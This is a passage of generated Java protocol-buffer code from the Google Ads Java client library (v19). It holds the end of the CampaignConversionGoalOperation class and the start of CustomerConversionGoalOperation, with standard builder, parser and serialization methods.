com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.class, 
com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v19.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v19.services.CampaignConversionGoalOperation build() { com.google.ads.googleads.v19.services.CampaignConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v19.services.CampaignConversionGoalOperation buildPartial() { com.google.ads.googleads.v19.services.CampaignConversionGoalOperation result = new com.google.ads.googleads.v19.services.CampaignConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return 
result; } private void buildPartial0(com.google.ads.googleads.v19.services.CampaignConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v19.services.CampaignConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v19.services.CampaignConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v19.services.CampaignConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v19.services.CampaignConversionGoalOperation other) { if (other == 
com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are 
modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CampaignConversionGoal, com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> * @return The update. 
*/ @java.lang.Override public com.google.ads.googleads.v19.resources.CampaignConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v19.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v19.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v19.resources.CampaignConversionGoal.newBuilder((com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CampaignConversionGoal, com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CampaignConversionGoal, com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder>( (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // 
@@protoc_insertion_point(builder_scope:google.ads.googleads.v19.services.CampaignConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v19.services.CampaignConversionGoalOperation) private static final com.google.ads.googleads.v19.services.CampaignConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v19.services.CampaignConversionGoalOperation(); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CampaignConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CampaignConversionGoalOperation>() { @java.lang.Override public CampaignConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CampaignConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CampaignConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v19.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,941
google-ads-stubs-v19/src/main/java/com/google/ads/googleads/v19/services/CustomerConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v19/services/customer_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v19.services; /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CustomerConversionGoalOperation} */ public final class CustomerConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v19.services.CustomerConversionGoalOperation) CustomerConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CustomerConversionGoalOperation.newBuilder() to construct. private CustomerConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CustomerConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CustomerConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; 
public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? 
com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v19.resources.CustomerConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v19.services.CustomerConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v19.services.CustomerConversionGoalOperation other = (com.google.ads.googleads.v19.services.CustomerConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return 
false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static 
com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream 
input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v19.services.CustomerConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CustomerConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v19.services.CustomerConversionGoalOperation) com.google.ads.googleads.v19.services.CustomerConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.class, 
com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v19.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v19.services.CustomerConversionGoalOperation build() { com.google.ads.googleads.v19.services.CustomerConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v19.services.CustomerConversionGoalOperation buildPartial() { com.google.ads.googleads.v19.services.CustomerConversionGoalOperation result = new com.google.ads.googleads.v19.services.CustomerConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return 
result; } private void buildPartial0(com.google.ads.googleads.v19.services.CustomerConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v19.services.CustomerConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v19.services.CustomerConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v19.services.CustomerConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v19.services.CustomerConversionGoalOperation other) { if (other == 
